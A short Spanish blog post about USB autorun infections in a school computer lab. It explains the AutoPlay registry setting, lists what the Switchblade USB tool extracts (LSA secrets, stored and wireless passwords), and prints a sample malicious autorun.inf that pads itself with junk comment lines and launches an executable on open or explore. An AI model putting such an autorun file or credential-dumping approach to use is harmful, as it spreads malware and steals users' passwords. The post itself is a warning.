Ataque de red desde un enlace remoto

|

Hola que tal, después de una semana de desarrollar practicas para mi curso JSCP y de andar trayendo mi memoria USB 2.0 de una compu a otra en el laboratorio de la escuela, me entero que gran parte de estas tienen no un virus; mas bien es un cocktel de virus y quien sabe que porquería más (y como no, si tienen WinUE7). Al grado que ya es común escuchar al ritmo de un vals el pitido de alerta que emite el antivirus o ver las pantallas de color rojo cuando se conecta las memorias infectdas,que decir del mensaje de que la memoria virtual esta llena....XD

Asi es los ordenadores parecen una especie de zombies que en conjunto bien trabajarían como un botNet, la mayor parte de los usuarios no se detienen a pensar como frenar esto, creen que con su antivirus al día será mas que suficiente, aunque claro que no...No es muy difícil entender lo que contiene un autorun.inf dentro de una memoria. La siguiente configuración esta relacionada con software y juegos que se almacena en la siguiente clave del Registro:



Hive: HKEY_CURRENT_USER
Key: \Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
UserChosenExecuteHandlers\AutorunINFLegacyArrival
Value: (Default)
Data:
MSAutoRun – ejecuta automáticamente el programa especificado en el archivo de autorun.inf
MSPromptEachTime – prompts the user, using strings specified in the autorun.inf file, if available


Entonces...¿Por que no deshabilitan la reproducción automatica?, y mira que no se necesitan permisos de administrador para modificar un autorun.inf

Pero la cosa no termina allí, pues hay unos troyanos modificados que permiten prácticamente a cualquiera sacar provecho de aquellas personas que dejan sus puertos USB desprotegidos. Por ejemplo, Switchblade permite volcar lo siguiente:

  • Información del sistema
  • Todos los servicios de red
  • Una lista de los puertos que escuchan
  • Todas las claves de producto de los productos de Microsoft en el equipo
  • La base de datos de contraseñas local
  • La contraseña de cualquier red inalámbrica que use el equipo
  • Todas las contraseñas de red que haya almacenado en el equipo el usuario que ha iniciado sesión
  • Contraseñas de Internet Explorer®, Messenger, Firefox y de correo electrónico
  • Los secretos de la Autoridad local de seguridad (LSA), que contienen todas las contraseñas de cuenta de servicio en texto no cifrado
  • Una lista de las revisiones instaladas
  • Un historial reciente de exploración
Todo esto formará parte de un archivo de registro de la unidad flash y tan solo tarda unos 45 segundos en completarse.

Este es un ejemplo, de autorun.inf malicioso

;was0sAO
[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
shell\open\Default=1
;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
shell\explore\Command=xo8wr9.exe
;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll

Solo echenle un poco de coco al asunto.

Enlaces[1]

0 comentarios: